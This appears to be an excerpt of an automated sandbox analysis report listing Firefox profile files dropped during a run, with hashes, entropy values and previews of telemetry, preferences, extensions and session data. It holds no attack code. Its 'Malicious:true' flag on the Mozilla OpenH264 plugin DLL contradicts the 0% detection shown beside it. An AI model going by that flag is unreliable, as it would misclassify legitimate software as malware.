                                                                                                                                                                                  Preview:/submit/firefox-desktop/events/1/a7791896-2046-4b05-9685-73f32d9a99cc.{"ping_info":{"seq":1,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"startup","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"first_run_date":"2023-10-05+02:00","build_date":"1970-01-01T00:00:00+00:00","client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","architecture":"x86_64","loc

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\b21f31f8-fb59-4e8d-9fe8-b64d11a07cfa

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1538)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1618
                                                                                                                                                                                  Entropy (8bit):5.09652312694415
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:FzvcoWLV9Z0uSaaOHrUP8/tFHa+jZmPb8v7qk:K30uSaaOHs8z6+jZib8v+k
                                                                                                                                                                                  MD5:4F5875201AE6367D24257D8567B9BD3F
                                                                                                                                                                                  SHA1:65BEABC6802767A5E969D7BF8287937BE44ED766
                                                                                                                                                                                  SHA-256:5B64C3F72BE2E4A081269D7B46AB272260392FA99806B4831BFBC5521C31BB2F
                                                                                                                                                                                  SHA-512:9C5359967836FA94384B9558C08362D3F3B354279F94CD8246E7E3266FD4DF5DEDD04CAD3D7C370CEA83B2D0C9845353DA9791CBC6D7AAD047A3E325A7A6C903
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/b21f31f8-fb59-4e8d-9fe8-b64d11a07cfa.{"ping_info":{"seq":11,"start_time":"2024-02-21T13:44+01:00","end_time":"2024-02-21T13:44+01:00","experiments":{"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"type":"nimbus-nimbus","enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","app_display_version":"118.0.1",

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\session-state.json

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):161
                                                                                                                                                                                  Entropy (8bit):4.8857557213705665
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YWAqKskLXccITseYeuJHBMfYgyd8dIJQJA2aqnLJrja/H5C:YWAqfX5I11H6f+mEQOanLFu/ZC
                                                                                                                                                                                  MD5:7F96AC92385790FB23FFE4E438AABEA5
                                                                                                                                                                                  SHA1:425EF2E10194B521AE6DD638D797D0581BFE3C03
                                                                                                                                                                                  SHA-256:AD3E3BEE1AE016AC26285D4C87090C1A077160BFB6F716AF87A2D2AD955ED820
                                                                                                                                                                                  SHA-512:E8DF61BD4FD9F3E6D5143EE0620275B2123D00485AE15D3D5D52199A722EC2E200F4E2ECC769A330224A31C10673D3C119AEF718FD7D966CE384880142699A13
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"sessionId":"8013cf57-3299-4c3c-af20-1d89a1328d5c","subsessionId":"7f0379b0-9df3-4fe1-8b98-3a895a724f81","profileSubsessionCounter":3,"newProfilePingSent":true}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):36830
                                                                                                                                                                                  Entropy (8bit):5.185052013683835
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:AI4wvfCXh496G4C4U1W4z4xuHhvp4N4Tc4Z4S4t24U:AruBv3
                                                                                                                                                                                  MD5:10E2D85FEF0DB266E519048D63617FA8
                                                                                                                                                                                  SHA1:EBB307C44EBEFFA271AC58FDDE5C3A1BA52AE7B0
                                                                                                                                                                                  SHA-256:92143A48F55639B5BD01385D0E4E78EDED4F84401A91C12AC06251EE188CFE0E
                                                                                                                                                                                  SHA-512:164CBE725B44020AD40D165A1B1C242A7016ED8933AB9502D0D38E6CD99887D9DF49533DE54068AA4E5D8476C7791B52518A8477B8961475B7CB2C3AF54B81B1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{87ef1fa3-cb84-4bbf-a615-45a1d14b629d}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):36830
                                                                                                                                                                                  Entropy (8bit):5.185052013683835
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:AI4wvfCXh496G4C4U1W4z4xuHhvp4N4Tc4Z4S4t24U:AruBv3
                                                                                                                                                                                  MD5:10E2D85FEF0DB266E519048D63617FA8
                                                                                                                                                                                  SHA1:EBB307C44EBEFFA271AC58FDDE5C3A1BA52AE7B0
                                                                                                                                                                                  SHA-256:92143A48F55639B5BD01385D0E4E78EDED4F84401A91C12AC06251EE188CFE0E
                                                                                                                                                                                  SHA-512:164CBE725B44020AD40D165A1B1C242A7016ED8933AB9502D0D38E6CD99887D9DF49533DE54068AA4E5D8476C7791B52518A8477B8961475B7CB2C3AF54B81B1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{87ef1fa3-cb84-4bbf-a615-45a1d14b629d}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite-journal

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):33288
                                                                                                                                                                                  Entropy (8bit):0.4612989124354543
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:7+tPN6LiOVxExBWrkier5NzW6LlmProNpNmVIpPuVM7rBmxF/EzgF:7MPN6XHMArt0pmcNptpGVM7rBw/vF
                                                                                                                                                                                  MD5:F44A28F22288BFA610C0D1FBACC486FC
                                                                                                                                                                                  SHA1:DFCE3E517E7FB2253F781CD4964789FFB81C9D73
                                                                                                                                                                                  SHA-256:5F10EBD8817D269008BAE2DA40265D7E4D835CD93D85041AF5942CCC69683ADF
                                                                                                                                                                                  SHA-512:0427AE8EF849497C5D92AE3CB73C4C8E02B8076745A1719B4FD7A0FAEBD7FF82592B21CDAC3A2ACFCA88176C42868C453B0B1D5AD47B9218C01C398522C0C946
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... .c.......LR....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................j......z....~k}.|o{.{wz...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1102240
                                                                                                                                                                                  Entropy (8bit):6.6236318014412126
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:bif6DS+hWYEwTkhPcB64VjVEj3cYemypfYIC:bTDSNwToPcfjBmypf6
                                                                                                                                                                                  MD5:842039753BF41FA5E11B3A1383061A87
                                                                                                                                                                                  SHA1:3E8FE1D7B3AD866B06DCA6C7EF1E3C50C406E153
                                                                                                                                                                                  SHA-256:D88DD3BFC4A558BB943F3CAA2E376DA3942E48A7948763BF9A38F707C2CD0C1C
                                                                                                                                                                                  SHA-512:D3320F7AC46327B7B974E74320C4D853E569061CB89CA849CD5D1706330ACA629ABEB4A16435C541900D839F46FF72DFDE04128C450F3E1EE63C025470C19157
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V..V7.V7.V7.9S.C7.9S.[7.9S..7.9S.U7.V7.17.._._7.._.b7.._.H7.V7.87.?_.W7.?_.W7.RichV7.........PE..d.....Jd.........." .................C....................................................`.........................................P7..,...|8..(................I.......)..............T...................`...(...`................................................text.............................. ..`.rodata............................. ..`.rdata..F...........................@..@.data...p3...P.......2..............@....pdata...I.......J...N..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1102240
                                                                                                                                                                                  Entropy (8bit):6.6236318014412126
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:bif6DS+hWYEwTkhPcB64VjVEj3cYemypfYIC:bTDSNwToPcfjBmypf6
                                                                                                                                                                                  MD5:842039753BF41FA5E11B3A1383061A87
                                                                                                                                                                                  SHA1:3E8FE1D7B3AD866B06DCA6C7EF1E3C50C406E153
                                                                                                                                                                                  SHA-256:D88DD3BFC4A558BB943F3CAA2E376DA3942E48A7948763BF9A38F707C2CD0C1C
                                                                                                                                                                                  SHA-512:D3320F7AC46327B7B974E74320C4D853E569061CB89CA849CD5D1706330ACA629ABEB4A16435C541900D839F46FF72DFDE04128C450F3E1EE63C025470C19157
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V..V7.V7.V7.9S.C7.9S.[7.9S..7.9S.U7.V7.17.._._7.._.b7.._.H7.V7.87.?_.W7.?_.W7.RichV7.........PE..d.....Jd.........." .................C....................................................`.........................................P7..,...|8..(................I.......)..............T...................`...(...`................................................text.............................. ..`.rodata............................. ..`.rdata..F...........................@..@.data...p3...P.......2..............@....pdata...I.......J...N..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):116
                                                                                                                                                                                  Entropy (8bit):4.920722044218877
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:C3OuN9RAM7VDXcEzq+r2Xl3vTMBv+FdBAIABv+FEn:0BDUm213vAWeWEn
                                                                                                                                                                                  MD5:2A461E9EB87FD1955CEA740A3444EE7A
                                                                                                                                                                                  SHA1:B10755914C713F5A4677494DBE8A686ED458C3C5
                                                                                                                                                                                  SHA-256:4107F76BA1D9424555F4E8EA0ACEF69357DFFF89DFA5F0EC72AA4F2D489B17BC
                                                                                                                                                                                  SHA-512:34F73F7BF69D7674907F190F257516E3956F825E35A2F03D58201A5A630310B45DF393F2B39669F9369D1AC990505A4B6849A0D34E8C136E1402143B6CEDF2D3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 2.3.2.APIs: encode-video[h264], decode-video[h264].

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):116
                                                                                                                                                                                  Entropy (8bit):4.920722044218877
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:C3OuN9RAM7VDXcEzq+r2Xl3vTMBv+FdBAIABv+FEn:0BDUm213vAWeWEn
                                                                                                                                                                                  MD5:2A461E9EB87FD1955CEA740A3444EE7A
                                                                                                                                                                                  SHA1:B10755914C713F5A4677494DBE8A686ED458C3C5
                                                                                                                                                                                  SHA-256:4107F76BA1D9424555F4E8EA0ACEF69357DFFF89DFA5F0EC72AA4F2D489B17BC
                                                                                                                                                                                  SHA-512:34F73F7BF69D7674907F190F257516E3956F825E35A2F03D58201A5A630310B45DF393F2B39669F9369D1AC990505A4B6849A0D34E8C136E1402143B6CEDF2D3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 2.3.2.APIs: encode-video[h264], decode-video[h264].

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite-journal

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):66064
                                                                                                                                                                                  Entropy (8bit):0.12276882319696106
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:7+tqQVC+guGBg1f8QEO/Jv6Bl/bAWla0mwPxRymgObsCVR45wcYR4fmnsCVR4j:7+tNs+ABVER6LbUsh7Owd4+M
                                                                                                                                                                                  MD5:7919BAAEC7C90B044C3E867644782735
                                                                                                                                                                                  SHA1:D54688590A120AA9DF2F49BE3B8643E0CA339931
                                                                                                                                                                                  SHA-256:EAC0DAA79073BA71DA68A20759901F985DA357CD9FC6ECC5AAE38FFA2EB3F0BC
                                                                                                                                                                                  SHA-512:CEBE5F16EEFC65B03463C4B7D789A7662F955BC5B5523415AB9DB1533E81A7C9CEDFBDB6898E3F9A35DA8C35CAFB714CEE390681B9E00E4E4287C85BF42AE69C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... .c......0d.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs-1.js

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):17070
                                                                                                                                                                                  Entropy (8bit):5.426235242558987
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ynTFTRRUYbBp6wLZNMGaXdm+qU4Knzy+/3/7Wu5RYiNBw8dlxHkgSl:YKe9FNMVtzyCJdwW0
                                                                                                                                                                                  MD5:2AAE4FDB4C6EF138B735DD1726868073
                                                                                                                                                                                  SHA1:4066C3CB21BFBD26B112DA9FD7D61E4BAB0D7415
                                                                                                                                                                                  SHA-256:2EF92B48C6E678DEB881D7D5D3DE16AFD247C225B5C7FA8E2305F9A908B54194
                                                                                                                                                                                  SHA-512:00C546DCBF78A53A143719D8F6ABF161B0114DD2E4A1FB19274938A4C6952E2FEB7CA0B1144E08824A18CC6A3B775B457773A306069B9EB5E55963D99D67F835
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1708519436);..user_pref("app.update.lastUpdateTime.background-update-timer", 1708519436);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1708519436);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.r

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17070
                                                                                                                                                                                  Entropy (8bit):5.426235242558987
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ynTFTRRUYbBp6wLZNMGaXdm+qU4Knzy+/3/7Wu5RYiNBw8dlxHkgSl:YKe9FNMVtzyCJdwW0
                                                                                                                                                                                  MD5:2AAE4FDB4C6EF138B735DD1726868073
                                                                                                                                                                                  SHA1:4066C3CB21BFBD26B112DA9FD7D61E4BAB0D7415
                                                                                                                                                                                  SHA-256:2EF92B48C6E678DEB881D7D5D3DE16AFD247C225B5C7FA8E2305F9A908B54194
                                                                                                                                                                                  SHA-512:00C546DCBF78A53A143719D8F6ABF161B0114DD2E4A1FB19274938A4C6952E2FEB7CA0B1144E08824A18CC6A3B775B457773A306069B9EB5E55963D99D67F835
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1708519436);..user_pref("app.update.lastUpdateTime.background-update-timer", 1708519436);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1708519436);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.r

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite-journal

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):33288
                                                                                                                                                                                  Entropy (8bit):0.08338195131242726
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:7+/lXfgtBl/lquN1P4BEJYqWvLue3FMOrMZ0wI:7+tXf6Bl/ZnjfJiFxMZm
                                                                                                                                                                                  MD5:A9AFF210EBF176BDE047205097B8F0C0
                                                                                                                                                                                  SHA1:2ADAF1C4A754F2992087A74E72AF4E5587597A37
                                                                                                                                                                                  SHA-256:11CDCCA190C9240FC44E739F329D51CC8515B0BDD0974DE016BAF19D0DCD8FD2
                                                                                                                                                                                  SHA-512:0994C0A8B8734688A44963188FF225D7A6AF4960D916DFA9B1061AD95487251CC6AACCDB18C7B49ECC1E6BCFF0BE223BF835A501D1662C5FB9B8C970CC35B944
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... .c.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................j.......x..x......................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):90
                                                                                                                                                                                  Entropy (8bit):4.194538242412464
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                  MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                  SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                  SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                  SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):90
                                                                                                                                                                                  Entropy (8bit):4.194538242412464
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                  MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                  SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                  SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                  SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\recovery.baklz4 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 19410 bytes
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6252
                                                                                                                                                                                  Entropy (8bit):6.65946569878185
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:FhyMjZWL7hYx7rnluViF0IlMZkcML4rsaSt6zi:Bjsp07seE3sa8L
                                                                                                                                                                                  MD5:63CA9F30BA62777BE4FF5B309BBD91FC
                                                                                                                                                                                  SHA1:706E218DB75103303A68C3E352B1F3F1B42E6560
                                                                                                                                                                                  SHA-256:78BCAB615E67057F06EAD77D84CB6A99EEEBC43B02F984B32B97644C9F584ACE
                                                                                                                                                                                  SHA-512:A8B10A66CA872DE9EEE590F401653AD28EED672B904E5E54EF7585A380568F4BBCC5BFB75944179C895C4DEFE8428573AFEAF422A2400E8D920EEA3163F1B175
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40..K....{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"https://www.youtube.com/","title#....cacheKey":0,"ID":4,"docshellUU...D"{11e7cea9-5bca-4ef4-99d5-d15ccdbf2a12}","resultPrincipalURI":null,"hasUserInteract....false,"triggering9.p_base64{..\"3\":{}_..6docIdentifier":5,"persist":true}],"lastAccessed":1708519407306,"hiddey..searchMode...userContextId...attributq..{},"index":1...questedI..s0,"imagL./},....accounts.googl....'......5.......8508044b-8b74-4031-8f66-d4fa2a869b35S...referrerInfo":"BBoSnxDOS9qmDeAnom1e0A...w..$EY.....0BAQ..oABAA==..^.6..._31123..x....facebook.._video....)......20....a5f52f7a-55de-42a5-a0f3-bf86fd118a2....../21...?719..V.."chrome://global/skin/icons/warning.svg":...2....0.&......265a797d-c1b5-444b-997e-dbc67fa45e893../22&..?207<.W.&.3.9..pv3/signt..D..?continue=D..%3A%2F%2F@...%2F&followup....ifkv=ATuJsjw9e7PC33_7-svQuQgHqA5CnbF8YAeK-gwghWImJ8owO10ADdpehR33T0NeoeEcxd4BmlVz&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\recovery.jsonlz4 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 19410 bytes
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6252
                                                                                                                                                                                  Entropy (8bit):6.65946569878185
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:FhyMjZWL7hYx7rnluViF0IlMZkcML4rsaSt6zi:Bjsp07seE3sa8L
                                                                                                                                                                                  MD5:63CA9F30BA62777BE4FF5B309BBD91FC
